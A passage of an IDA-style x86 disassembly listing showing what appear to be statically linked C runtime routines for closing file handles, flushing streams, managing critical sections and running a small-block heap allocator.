cmp esi, 1
jz short loc_417CA5
cmp esi, 2
jnz short loc_417CBB
loc_417CA5: ; CODE XREF: sub_417C89+15�j
push 2
call sub_41CD1B
push 1
mov edi, eax
call sub_41CD1B
cmp eax, edi
pop ecx
pop ecx
jz short loc_417CD7
loc_417CBB: ; CODE XREF: sub_417C89+1A�j
push esi
call sub_41CD1B
pop ecx
push eax
call ds:dword_42003C ; CloseHandle
test eax, eax
jnz short loc_417CD7
call ds:dword_420008 ; RtlGetLastWin32Error
mov edi, eax
jmp short loc_417CD9
; ---------------------------------------------------------------------------
loc_417CD7: ; CODE XREF: sub_417C89+10�j
; sub_417C89+30�j ...
xor edi, edi
loc_417CD9: ; CODE XREF: sub_417C89+4C�j
push esi
call sub_41CC9C
mov eax, esi
sar eax, 5
mov eax, dword_47C620[eax*4]
and esi, 1Fh
pop ecx
lea ecx, [esi+esi*8]
and byte ptr [eax+ecx*4+4], 0
test edi, edi
jz short loc_417D07
push edi
call sub_419612
pop ecx
or eax, 0FFFFFFFFh
jmp short loc_417D09
; ---------------------------------------------------------------------------
loc_417D07: ; CODE XREF: sub_417C89+70�j
xor eax, eax
loc_417D09: ; CODE XREF: sub_417C89+7C�j
pop edi
pop esi
retn
sub_417C89 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417D0C proc near ; CODE XREF: sub_414977+20�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 00417D8B SIZE 0000001C BYTES
push 0Ch
push offset stru_429018
call __SEH_prolog
mov ebx, [ebp+arg_0]
cmp ebx, dword_47C618
jnb short loc_417D8B
mov eax, ebx
sar eax, 5
lea edi, ds:47C620h[eax*4]
mov eax, ebx
and eax, 1Fh
lea esi, [eax+eax*8]
shl esi, 2
mov eax, [edi]
test byte ptr [eax+esi+4], 1
jz short loc_417D8B
push ebx
call sub_41CD5C
pop ecx
and [ebp+ms_exc.disabled], 0
mov eax, [edi]
test byte ptr [eax+esi+4], 1
jz short loc_417D63
push ebx
call sub_417C89
pop ecx
mov [ebp+var_1C], eax
jmp short loc_417D72
; ---------------------------------------------------------------------------
loc_417D63: ; CODE XREF: sub_417D0C+49�j
call sub_419600
mov dword ptr [eax], 9
or [ebp+var_1C], 0FFFFFFFFh
loc_417D72: ; CODE XREF: sub_417D0C+55�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_417D83
mov eax, [ebp+var_1C]
jmp short loc_417DA1
sub_417D0C endp
; =============== S U B R O U T I N E =======================================
sub_417D80 proc near ; DATA XREF: .rdata:stru_429018�o
mov ebx, [ebp+8]
sub_417D80 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_417D83 proc near ; CODE XREF: sub_417D0C+6A�p
push ebx
call sub_41CDCF
pop ecx
retn
sub_417D83 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_417D0C
loc_417D8B: ; CODE XREF: sub_417D0C+15�j
; sub_417D0C+35�j
call sub_419600
mov dword ptr [eax], 9
call sub_419609
and dword ptr [eax], 0
or eax, 0FFFFFFFFh
loc_417DA1: ; CODE XREF: sub_417D0C+72�j
call __SEH_epilog
retn
; END OF FUNCTION CHUNK FOR sub_417D0C
; =============== S U B R O U T I N E =======================================
sub_417DA7 proc near ; CODE XREF: sub_414977+18�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi+0Ch]
test al, 83h
jz short loc_417DD0
test al, 8
jz short loc_417DD0
push dword ptr [esi+8]
call sub_414A14
and word ptr [esi+0Ch], 0FBF7h
xor eax, eax
pop ecx
mov [esi], eax
mov [esi+8], eax
mov [esi+4], eax
loc_417DD0: ; CODE XREF: sub_417DA7+A�j
; sub_417DA7+E�j
pop esi
retn
sub_417DA7 endp
; =============== S U B R O U T I N E =======================================
sub_417DD2 proc near ; CODE XREF: sub_414977+10�p
; sub_4161C8+38�p ...
arg_0 = dword ptr 4
push ebx
push esi
mov esi, [esp+8+arg_0]
mov eax, [esi+0Ch]
mov ecx, eax
and cl, 3
xor ebx, ebx
cmp cl, 2
jnz short loc_417E21
test ax, 108h
jz short loc_417E21
mov eax, [esi+8]
push edi
mov edi, [esi]
sub edi, eax
test edi, edi
jle short loc_417E20
push edi
push eax
push dword ptr [esi+10h]
call sub_41C0E0
add esp, 0Ch
cmp eax, edi
jnz short loc_417E19
mov eax, [esi+0Ch]
test al, al
jns short loc_417E20
and eax, 0FFFFFFFDh
mov [esi+0Ch], eax
jmp short loc_417E20
; ---------------------------------------------------------------------------
loc_417E19: ; CODE XREF: sub_417DD2+36�j
or dword ptr [esi+0Ch], 20h
or ebx, 0FFFFFFFFh
loc_417E20: ; CODE XREF: sub_417DD2+25�j
; sub_417DD2+3D�j ...
pop edi
loc_417E21: ; CODE XREF: sub_417DD2+13�j
; sub_417DD2+19�j
mov eax, [esi+8]
and dword ptr [esi+4], 0
mov [esi], eax
pop esi
mov eax, ebx
pop ebx
retn
sub_417DD2 endp
; =============== S U B R O U T I N E =======================================
sub_417E2F proc near ; CODE XREF: sub_417E5D+67�p
; sub_417E5D+82�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push esi
call sub_417DD2
test eax, eax
pop ecx
jz short loc_417E44
or eax, 0FFFFFFFFh
pop esi
retn
; ---------------------------------------------------------------------------
loc_417E44: ; CODE XREF: sub_417E2F+E�j
test byte ptr [esi+0Dh], 40h
jz short loc_417E59
push dword ptr [esi+10h]
call sub_41CF3E
pop ecx
neg eax
sbb eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_417E59: ; CODE XREF: sub_417E2F+19�j
xor eax, eax
pop esi
retn
sub_417E2F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417E5D proc near ; CODE XREF: sub_417F32+2�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 00417F0E SIZE 0000001B BYTES
push 14h
push offset stru_429028
call __SEH_prolog
xor edi, edi
mov [ebp+var_1C], edi
mov [ebp+var_20], edi
push 1
call sub_418285
pop ecx
mov [ebp+ms_exc.disabled], edi
xor esi, esi
loc_417E7E: ; CODE XREF: sub_417E5D+99�j
mov [ebp+var_24], esi
cmp esi, dword_47D9A0
jge loc_417F0E
mov eax, dword_47C984
mov eax, [eax+esi*4]
cmp eax, edi
jz short loc_417EF5
test byte ptr [eax+0Ch], 83h
jz short loc_417EF5
push eax
push esi
call sub_418027
pop ecx
pop ecx
xor edx, edx
inc edx
mov [ebp+ms_exc.disabled], edx
mov eax, dword_47C984
mov eax, [eax+esi*4]
mov ecx, [eax+0Ch]
test cl, 83h
jz short loc_417EED
cmp [ebp+arg_0], edx
jnz short loc_417ED4
push eax
call sub_417E2F
pop ecx
cmp eax, 0FFFFFFFFh
jz short loc_417EED
inc [ebp+var_1C]
jmp short loc_417EED
; ---------------------------------------------------------------------------
loc_417ED4: ; CODE XREF: sub_417E5D+64�j
cmp [ebp+arg_0], edi
jnz short loc_417EED
test cl, 2
jz short loc_417EED
push eax
call sub_417E2F
pop ecx
cmp eax, 0FFFFFFFFh
jnz short loc_417EED
or [ebp+var_20], eax
loc_417EED: ; CODE XREF: sub_417E5D+5F�j
; sub_417E5D+70�j ...
mov [ebp+ms_exc.disabled], edi
call sub_417EFD
loc_417EF5: ; CODE XREF: sub_417E5D+3A�j
; sub_417E5D+40�j
inc esi
jmp short loc_417E7E
sub_417E5D endp
; =============== S U B R O U T I N E =======================================
sub_417EF8 proc near ; DATA XREF: .rdata:0042903C�o
xor edi, edi
mov esi, [ebp-24h]
sub_417EF8 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_417EFD proc near ; CODE XREF: sub_417E5D+93�p
mov eax, dword_47C984
push dword ptr [eax+esi*4]
push esi
call sub_418079
pop ecx
pop ecx
retn
sub_417EFD endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_417E5D
loc_417F0E: ; CODE XREF: sub_417E5D+2A�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_417F29
cmp [ebp+arg_0], 1
mov eax, [ebp+var_1C]
jz short loc_417F23
mov eax, [ebp+var_20]
loc_417F23: ; CODE XREF: sub_417E5D+C1�j
call __SEH_epilog
retn
; END OF FUNCTION CHUNK FOR sub_417E5D
; =============== S U B R O U T I N E =======================================
sub_417F29 proc near ; CODE XREF: sub_417E5D+B5�p
; DATA XREF: .rdata:stru_429028�o
push 1
call sub_4181F1
pop ecx
retn
sub_417F29 endp
; =============== S U B R O U T I N E =======================================
sub_417F32 proc near ; CODE XREF: sub_417FE4�p
push 1
call sub_417E5D
pop ecx
retn
sub_417F32 endp
; =============== S U B R O U T I N E =======================================
sub_417F3B proc near ; DATA XREF: .data:0042B010�o
mov eax, dword_47D9A0
test eax, eax
push esi
push 14h
pop esi
jnz short loc_417F4F
mov eax, 200h
jmp short loc_417F55
; ---------------------------------------------------------------------------
loc_417F4F: ; CODE XREF: sub_417F3B+B�j
cmp eax, esi
jge short loc_417F5A
mov eax, esi
loc_417F55: ; CODE XREF: sub_417F3B+12�j
mov dword_47D9A0, eax
loc_417F5A: ; CODE XREF: sub_417F3B+16�j
push 4
push eax
call sub_41C280
test eax, eax
pop ecx
pop ecx
mov dword_47C984, eax
jnz short loc_417F8B
push 4
push esi
mov dword_47D9A0, esi
call sub_41C280
test eax, eax
pop ecx
pop ecx
mov dword_47C984, eax
jnz short loc_417F8B
push 1Ah
pop eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_417F8B: ; CODE XREF: sub_417F3B+30�j
; sub_417F3B+49�j
xor edx, edx
mov ecx, offset off_42D978
jmp short loc_417F99
; ---------------------------------------------------------------------------
loc_417F94: ; CODE XREF: sub_417F3B+6D�j
mov eax, dword_47C984
loc_417F99: ; CODE XREF: sub_417F3B+57�j
mov [edx+eax], ecx
add ecx, 20h
add edx, 4
cmp ecx, offset dword_42DBF8
jl short loc_417F94
xor ecx, ecx
mov edx, offset dword_42D988
loc_417FB1: ; CODE XREF: sub_417F3B+A3�j
mov esi, ecx
mov eax, ecx
and eax, 1Fh
sar esi, 5
mov esi, dword_47C620[esi*4]
lea eax, [eax+eax*8]
mov eax, [esi+eax*4]
cmp eax, 0FFFFFFFFh
jz short loc_417FD1
test eax, eax
jnz short loc_417FD4
loc_417FD1: ; CODE XREF: sub_417F3B+90�j
or dword ptr [edx], 0FFFFFFFFh
loc_417FD4: ; CODE XREF: sub_417F3B+94�j
add edx, 20h
inc ecx
cmp edx, offset dword_42D9E8
jl short loc_417FB1
xor eax, eax
pop esi
retn
sub_417F3B endp
; =============== S U B R O U T I N E =======================================
sub_417FE4 proc near ; DATA XREF: .data:0042B028�o
; FUNCTION CHUNK AT 0041CFFA SIZE 00000092 BYTES
call sub_417F32
cmp byte_47C1DC, 0
jz short locret_417FF7
jmp loc_41CFFA
; ---------------------------------------------------------------------------
locret_417FF7: ; CODE XREF: sub_417FE4+C�j
retn
sub_417FE4 endp
; =============== S U B R O U T I N E =======================================
sub_417FF8 proc near ; CODE XREF: sub_4149C3+27�p
; sub_414B6E+F�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ecx, offset off_42D978
cmp eax, ecx
jb short loc_41801C
cmp eax, offset dword_42DBD8
ja short loc_41801C
sub eax, ecx
sar eax, 5
add eax, 10h
push eax
call sub_418285
pop ecx
retn
; ---------------------------------------------------------------------------
loc_41801C: ; CODE XREF: sub_417FF8+B�j
; sub_417FF8+12�j
add eax, 20h
push eax
call ds:dword_42001C ; RtlEnterCriticalSection
retn
sub_417FF8 endp
; =============== S U B R O U T I N E =======================================
sub_418027 proc near ; CODE XREF: sub_417E5D+44�p
; sub_419685+66�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
cmp eax, 14h
jge short loc_41803B
add eax, 10h
push eax
call sub_418285
pop ecx
retn
; ---------------------------------------------------------------------------
loc_41803B: ; CODE XREF: sub_418027+7�j
mov eax, [esp+arg_4]
add eax, 20h
push eax
call ds:dword_42001C ; RtlEnterCriticalSection
retn
sub_418027 endp
; =============== S U B R O U T I N E =======================================
sub_41804A proc near ; CODE XREF: sub_414A0C+1�p
; sub_414BB0+3�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ecx, offset off_42D978
cmp eax, ecx
jb short loc_41806E
cmp eax, offset dword_42DBD8
ja short loc_41806E
sub eax, ecx
sar eax, 5
add eax, 10h
push eax
call sub_4181F1
pop ecx
retn
; ---------------------------------------------------------------------------
loc_41806E: ; CODE XREF: sub_41804A+B�j
; sub_41804A+12�j
add eax, 20h
push eax
call ds:dword_420018 ; RtlLeaveCriticalSection
retn
sub_41804A endp
; =============== S U B R O U T I N E =======================================
sub_418079 proc near ; CODE XREF: sub_417EFD+9�p
; sub_419685+7D�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
cmp eax, 14h
jge short loc_41808D
add eax, 10h
push eax
call sub_4181F1
pop ecx
retn
; ---------------------------------------------------------------------------
loc_41808D: ; CODE XREF: sub_418079+7�j
mov eax, [esp+arg_4]
add eax, 20h
push eax
call ds:dword_420018 ; RtlLeaveCriticalSection
retn
sub_418079 endp
; [0000003B BYTES: COLLAPSED FUNCTION __SEH_prolog. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION __SEH_epilog. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_4180E8 proc near ; CODE XREF: sub_418102+20�p
cmp dword_47C1A4, 2
jnz short loc_4180FE
cmp dword_47C1B0, 5
jb short loc_4180FE
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_4180FE: ; CODE XREF: sub_4180E8+7�j
; sub_4180E8+10�j
push 3
pop eax
retn
sub_4180E8 endp
; =============== S U B R O U T I N E =======================================
sub_418102 proc near ; CODE XREF: .text:004163B2�p
arg_0 = dword ptr 4
xor eax, eax
cmp [esp+arg_0], eax
push 0
setz al
push 1000h
push eax
call ds:dword_420188 ; HeapCreate
test eax, eax
mov dword_47C97C, eax
jz short loc_41814C
call sub_4180E8
cmp eax, 3
mov dword_47C980, eax
jnz short loc_41814F
push 3F8h
call sub_4182B6
test eax, eax
pop ecx
jnz short loc_41814F
push dword_47C97C
call ds:dword_420184 ; HeapDestroy
loc_41814C: ; CODE XREF: sub_418102+1E�j
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_41814F: ; CODE XREF: sub_418102+2D�j
; sub_418102+3C�j
xor eax, eax
inc eax
retn
sub_418102 endp
; =============== S U B R O U T I N E =======================================
sub_418153 proc near ; CODE XREF: sub_416E86�p
push esi
push edi
xor esi, esi
mov edi, offset dword_47C208
loc_41815C: ; CODE XREF: sub_418153+35�j
cmp dword_42DC04[esi*8], 1
jnz short loc_418184
lea eax, ds:42DC00h[esi*8]
mov [eax], edi
push 0FA0h
push dword ptr [eax]
add edi, 18h
call sub_41D188
test eax, eax
pop ecx
pop ecx
jz short loc_418190
loc_418184: ; CODE XREF: sub_418153+11�j
inc esi
cmp esi, 24h
jl short loc_41815C
xor eax, eax
inc eax
loc_41818D: ; CODE XREF: sub_418153+47�j
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_418190: ; CODE XREF: sub_418153+2F�j
and dword_42DC00[esi*8], 0
xor eax, eax
jmp short loc_41818D
sub_418153 endp
; =============== S U B R O U T I N E =======================================
sub_41819C proc near ; CODE XREF: sub_416DF7�p
push ebx
mov ebx, ds:dword_420024
push esi
mov esi, offset dword_42DC00
push edi
loc_4181AA: ; CODE XREF: sub_41819C+30�j
mov edi, [esi]
test edi, edi
jz short loc_4181C3
cmp dword ptr [esi+4], 1
jz short loc_4181C3
push edi
call ebx ; RtlDeleteCriticalSection
push edi
call sub_414A14
and dword ptr [esi], 0
pop ecx
loc_4181C3: ; CODE XREF: sub_41819C+12�j
; sub_41819C+18�j
add esi, 8
cmp esi, offset dword_42DD20
jl short loc_4181AA
mov esi, offset dword_42DC00
pop edi
loc_4181D4: ; CODE XREF: sub_41819C+50�j
mov eax, [esi]
test eax, eax
jz short loc_4181E3
cmp dword ptr [esi+4], 1
jnz short loc_4181E3
push eax
call ebx ; RtlDeleteCriticalSection
loc_4181E3: ; CODE XREF: sub_41819C+3C�j
; sub_41819C+42�j
add esi, 8
cmp esi, offset dword_42DD20
jl short loc_4181D4
pop esi
pop ebx
retn
sub_41819C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4181F1 proc near ; CODE XREF: sub_414A67+2�p
; sub_414D22+2�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
push dword_42DC00[eax*8]
call ds:dword_420018 ; RtlLeaveCriticalSection
pop ebp
retn
sub_4181F1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418206 proc near ; CODE XREF: sub_418285+14�p
; sub_419685+4F�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_0]
lea esi, ds:42DC00h[esi*8]
cmp dword ptr [esi], 0
jz short loc_41821E
xor eax, eax
inc eax
jmp short loc_418282
; ---------------------------------------------------------------------------
loc_41821E: ; CODE XREF: sub_418206+11�j
push edi
push 18h
call sub_414E7D
mov edi, eax
test edi, edi
pop ecx
jnz short loc_41823C
loc_41822D: ; CODE XREF: sub_418206+63�j
call sub_419600
mov dword ptr [eax], 0Ch
xor eax, eax
jmp short loc_418281
; ---------------------------------------------------------------------------
loc_41823C: ; CODE XREF: sub_418206+25�j
push 0Ah
call sub_418285
cmp dword ptr [esi], 0
pop ecx
jnz short loc_41826F
push 0FA0h
push edi
call sub_41D188
test eax, eax
pop ecx
pop ecx
jnz short loc_41826B
push edi
call sub_414A14
push 0Ah
call sub_4181F1
pop ecx
pop ecx
jmp short loc_41822D
; ---------------------------------------------------------------------------
loc_41826B: ; CODE XREF: sub_418206+52�j
mov [esi], edi
jmp short loc_418276
; ---------------------------------------------------------------------------
loc_41826F: ; CODE XREF: sub_418206+41�j
push edi
call sub_414A14
pop ecx
loc_418276: ; CODE XREF: sub_418206+67�j
push 0Ah
call sub_4181F1
xor eax, eax
pop ecx
inc eax
loc_418281: ; CODE XREF: sub_418206+34�j
pop edi
loc_418282: ; CODE XREF: sub_418206+16�j
pop esi
pop ebp
retn
sub_418206 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418285 proc near ; CODE XREF: sub_414A14+1E�p
; sub_414BBA+51�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
push esi
lea esi, ds:42DC00h[eax*8]
cmp dword ptr [esi], 0
jnz short loc_4182AB
push eax
call sub_418206
test eax, eax
pop ecx
jnz short loc_4182AB
push 11h
call sub_4162A0
pop ecx
loc_4182AB: ; CODE XREF: sub_418285+11�j
; sub_418285+1C�j
push dword ptr [esi]
call ds:dword_42001C ; RtlEnterCriticalSection
pop esi
pop ebp
retn
sub_418285 endp
; =============== S U B R O U T I N E =======================================
sub_4182B6 proc near ; CODE XREF: sub_418102+34�p
arg_0 = dword ptr 4
push 140h
push 0
push dword_47C97C
call ds:dword_42005C ; RtlAllocateHeap
test eax, eax
mov dword_47C968, eax
jnz short loc_4182D3
retn
; ---------------------------------------------------------------------------
loc_4182D3: ; CODE XREF: sub_4182B6+1A�j
mov ecx, [esp+arg_0]
and dword_47C960, 0
and dword_47C964, 0
mov dword_47C970, eax
xor eax, eax
mov dword_47C96C, ecx
mov dword_47C974, 10h
inc eax
retn
sub_4182B6 endp
; =============== S U B R O U T I N E =======================================
sub_4182FE proc near ; CODE XREF: sub_414A14+29�p
; sub_414BBA+5B�p ...
arg_0 = dword ptr 4
mov eax, dword_47C964
lea ecx, [eax+eax*4]
mov eax, dword_47C968
lea ecx, [eax+ecx*4]
jmp short loc_418322
; ---------------------------------------------------------------------------
loc_418310: ; CODE XREF: sub_4182FE+26�j
mov edx, [esp+arg_0]
sub edx, [eax+0Ch]
cmp edx, 100000h
jb short locret_418328
add eax, 14h
loc_418322: ; CODE XREF: sub_4182FE+10�j
cmp eax, ecx
jb short loc_418310
xor eax, eax
locret_418328: ; CODE XREF: sub_4182FE+1F�j
retn
sub_4182FE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418329 proc near ; CODE XREF: sub_414A14+38�p
; sub_414BBA+B8�p ...
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
mov ecx, [ebp+arg_0]
mov eax, [ecx+10h]
push esi
mov esi, [ebp+arg_4]
push edi
mov edi, esi
sub edi, [ecx+0Ch]
add esi, 0FFFFFFFCh
shr edi, 0Fh
mov ecx, edi
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_10], ecx
mov ecx, [esi]
dec ecx
test cl, 1
mov [ebp+var_4], ecx
jnz loc_41863D
push ebx
lea ebx, [ecx+esi]
mov edx, [ebx]
mov [ebp+var_C], edx
mov edx, [esi-4]
mov [ebp+var_8], edx
mov edx, [ebp+var_C]
test dl, 1
mov [ebp+arg_4], ebx
jnz short loc_4183F4
sar edx, 4
dec edx
cmp edx, 3Fh
jbe short loc_41838C
push 3Fh
pop edx
loc_41838C: ; CODE XREF: sub_418329+5E�j
mov ecx, [ebx+4]
cmp ecx, [ebx+8]
jnz short loc_4183D6
cmp edx, 20h
mov ebx, 80000000h
jnb short loc_4183B7
mov ecx, edx
shr ebx, cl
lea ecx, [edx+eax+4]
not ebx
and [eax+edi*4+44h], ebx
dec byte ptr [ecx]
jnz short loc_4183D3
mov ecx, [ebp+arg_0]
and [ecx], ebx
jmp short loc_4183D3
; ---------------------------------------------------------------------------
loc_4183B7: ; CODE XREF: sub_418329+73�j
lea ecx, [edx-20h]
shr ebx, cl
lea ecx, [edx+eax+4]
not ebx
and [eax+edi*4+0C4h], ebx
dec byte ptr [ecx]
jnz short loc_4183D3
mov ecx, [ebp+arg_0]
and [ecx+4], ebx
loc_4183D3: ; CODE XREF: sub_418329+85�j
; sub_418329+8C�j ...
mov ebx, [ebp+arg_4]
loc_4183D6: ; CODE XREF: sub_418329+69�j
mov edx, [ebx+8]
mov ebx, [ebx+4]
mov ecx, [ebp+var_4]
add ecx, [ebp+var_C]
mov [edx+4], ebx
mov edx, [ebp+arg_4]
mov ebx, [edx+4]
mov edx, [edx+8]
mov [ebx+8], edx
mov [ebp+var_4], ecx
loc_4183F4: ; CODE XREF: sub_418329+55�j
mov edx, ecx
sar edx, 4
dec edx
cmp edx, 3Fh
jbe short loc_418402
push 3Fh
pop edx
loc_418402: ; CODE XREF: sub_418329+D4�j
mov ebx, [ebp+var_8]
and ebx, 1
mov [ebp+var_C], ebx
jnz loc_4184A0
sub esi, [ebp+var_8]
mov ebx, [ebp+var_8]
sar ebx, 4
push 3Fh
mov [ebp+arg_4], esi
dec ebx
pop esi
cmp ebx, esi
jbe short loc_418427
mov ebx, esi
loc_418427: ; CODE XREF: sub_418329+FA�j
add ecx, [ebp+var_8]
mov edx, ecx
sar edx, 4
dec edx
cmp edx, esi
mov [ebp+var_4], ecx
jbe short loc_418439
mov edx, esi
loc_418439: ; CODE XREF: sub_418329+10C�j
cmp ebx, edx
jz short loc_41849B
mov ecx, [ebp+arg_4]
mov esi, [ecx+4]
cmp esi, [ecx+8]
jnz short loc_418483
cmp ebx, 20h
mov esi, 80000000h
jnb short loc_418469
mov ecx, ebx
shr esi, cl
not esi
and [eax+edi*4+44h], esi
dec byte ptr [ebx+eax+4]
jnz short loc_418483
mov ecx, [ebp+arg_0]
and [ecx], esi
jmp short loc_418483
; ---------------------------------------------------------------------------
loc_418469: ; CODE XREF: sub_418329+127�j
lea ecx, [ebx-20h]
shr esi, cl
not esi
and [eax+edi*4+0C4h], esi
dec byte ptr [ebx+eax+4]
jnz short loc_418483
mov ecx, [ebp+arg_0]
and [ecx+4], esi
loc_418483: ; CODE XREF: sub_418329+11D�j
; sub_418329+137�j ...
mov ecx, [ebp+arg_4]
mov esi, [ecx+8]
mov ecx, [ecx+4]
mov [esi+4], ecx
mov ecx, [ebp+arg_4]
mov esi, [ecx+4]
mov ecx, [ecx+8]
mov [esi+8], ecx
loc_41849B: ; CODE XREF: sub_418329+112�j
mov esi, [ebp+arg_4]
jmp short loc_4184A3
; ---------------------------------------------------------------------------
loc_4184A0: ; CODE XREF: sub_418329+E2�j
mov ebx, [ebp+arg_0]
loc_4184A3: ; CODE XREF: sub_418329+175�j
cmp [ebp+var_C], 0
jnz short loc_4184B1
cmp ebx, edx
jz loc_418531
loc_4184B1: ; CODE XREF: sub_418329+17E�j
mov ecx, [ebp+var_10]
lea ecx, [ecx+edx*8]
mov ebx, [ecx+4]
mov [esi+8], ecx
mov [esi+4], ebx
mov [ecx+4], esi
mov ecx, [esi+4]
mov [ecx+8], esi
mov ecx, [esi+4]
cmp ecx, [esi+8]
jnz short loc_418531
mov cl, [edx+eax+4]
mov byte ptr [ebp+arg_4+3], cl
inc cl
cmp edx, 20h
mov [edx+eax+4], cl
jnb short loc_418508
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_4184F7
mov ecx, edx
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx], ebx
loc_4184F7: ; CODE XREF: sub_418329+1BE�j
mov ebx, 80000000h
mov ecx, edx
shr ebx, cl
lea eax, [eax+edi*4+44h]
or [eax], ebx
jmp short loc_418531
; ---------------------------------------------------------------------------
loc_418508: ; CODE XREF: sub_418329+1B8�j
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_41851E
lea ecx, [edx-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx+4], ebx
loc_41851E: ; CODE XREF: sub_418329+1E3�j
lea ecx, [edx-20h]
mov edx, 80000000h
shr edx, cl
lea eax, [eax+edi*4+0C4h]
or [eax], edx
loc_418531: ; CODE XREF: sub_418329+182�j
; sub_418329+1A6�j ...
mov eax, [ebp+var_4]
mov [esi], eax
mov [eax+esi-4], eax
mov eax, [ebp+var_10]
dec dword ptr [eax]
jnz loc_41863C
mov eax, dword_47C960
test eax, eax
jz loc_41862E
mov ecx, dword_47C978
mov esi, ds:dword_42018C
push 4000h
shl ecx, 0Fh
add ecx, [eax+0Ch]
mov ebx, 8000h
push ebx
push ecx
call esi ; VirtualFree
mov ecx, dword_47C978
mov eax, dword_47C960
mov edx, 80000000h
shr edx, cl
or [eax+8], edx
mov eax, dword_47C960
mov eax, [eax+10h]
mov ecx, dword_47C978
and dword ptr [eax+ecx*4+0C4h], 0
mov eax, dword_47C960
mov eax, [eax+10h]
dec byte ptr [eax+43h]
mov eax, dword_47C960
mov ecx, [eax+10h]
cmp byte ptr [ecx+43h], 0
jnz short loc_4185BF
and dword ptr [eax+4], 0FFFFFFFEh
mov eax, dword_47C960
loc_4185BF: ; CODE XREF: sub_418329+28B�j
cmp dword ptr [eax+8], 0FFFFFFFFh
jnz short loc_41862E
push ebx
push 0
push dword ptr [eax+0Ch]
call esi ; VirtualFree
mov eax, dword_47C960
push dword ptr [eax+10h]
push 0
push dword_47C97C
call ds:dword_420058 ; RtlFreeHeap
mov eax, dword_47C964
mov edx, dword_47C968
lea eax, [eax+eax*4]
shl eax, 2
mov ecx, eax
mov eax, dword_47C960
sub ecx, eax
lea ecx, [ecx+edx-14h]
push ecx
lea ecx, [eax+14h]
push ecx
push eax
call sub_41D220
mov eax, [ebp+arg_0]
add esp, 0Ch
dec dword_47C964
cmp eax, dword_47C960
jbe short loc_418624
sub [ebp+arg_0], 14h
loc_418624: ; CODE XREF: sub_418329+2F5�j
mov eax, dword_47C968
mov dword_47C970, eax
loc_41862E: ; CODE XREF: sub_418329+223�j
; sub_418329+29A�j
mov eax, [ebp+arg_0]
mov dword_47C960, eax
mov dword_47C978, edi
loc_41863C: ; CODE XREF: sub_418329+216�j
pop ebx
loc_41863D: ; CODE XREF: sub_418329+37�j
pop edi
pop esi
leave
retn
sub_418329 endp
; =============== S U B R O U T I N E =======================================
sub_418641 proc near ; CODE XREF: sub_418ADD+150�p
mov eax, dword_47C964
mov ecx, dword_47C974
push edi
xor edi, edi
cmp eax, ecx
jnz short loc_418687
lea eax, [ecx+ecx*4+50h]
shl eax, 2
push eax
push dword_47C968
push edi
push dword_47C97C
call ds:dword_420158 ; RtlReAllocateHeap
cmp eax, edi
jnz short loc_418676
xor eax, eax
pop edi
retn
; ---------------------------------------------------------------------------
loc_418676: ; CODE XREF: sub_418641+2F�j
add dword_47C974, 10h
mov dword_47C968, eax
mov eax, dword_47C964
loc_418687: ; CODE XREF: sub_418641+10�j
mov ecx, dword_47C968
push esi
push 41C4h
push 8
push dword_47C97C
lea eax, [eax+eax*4]
lea esi, [ecx+eax*4]
call ds:dword_42005C ; RtlAllocateHeap
cmp eax, edi
mov [esi+10h], eax
jnz short loc_4186B2
loc_4186AE: ; CODE XREF: sub_418641+9B�j
xor eax, eax
jmp short loc_4186F5
; ---------------------------------------------------------------------------
loc_4186B2: ; CODE XREF: sub_418641+6B�j
push 4
push 2000h
push 100000h
push edi
call ds:dword_420190 ; VirtualAlloc
cmp eax, edi
mov [esi+0Ch], eax
jnz short loc_4186DE
push dword ptr [esi+10h]
push edi
push dword_47C97C
call ds:dword_420058 ; RtlFreeHeap
jmp short loc_4186AE
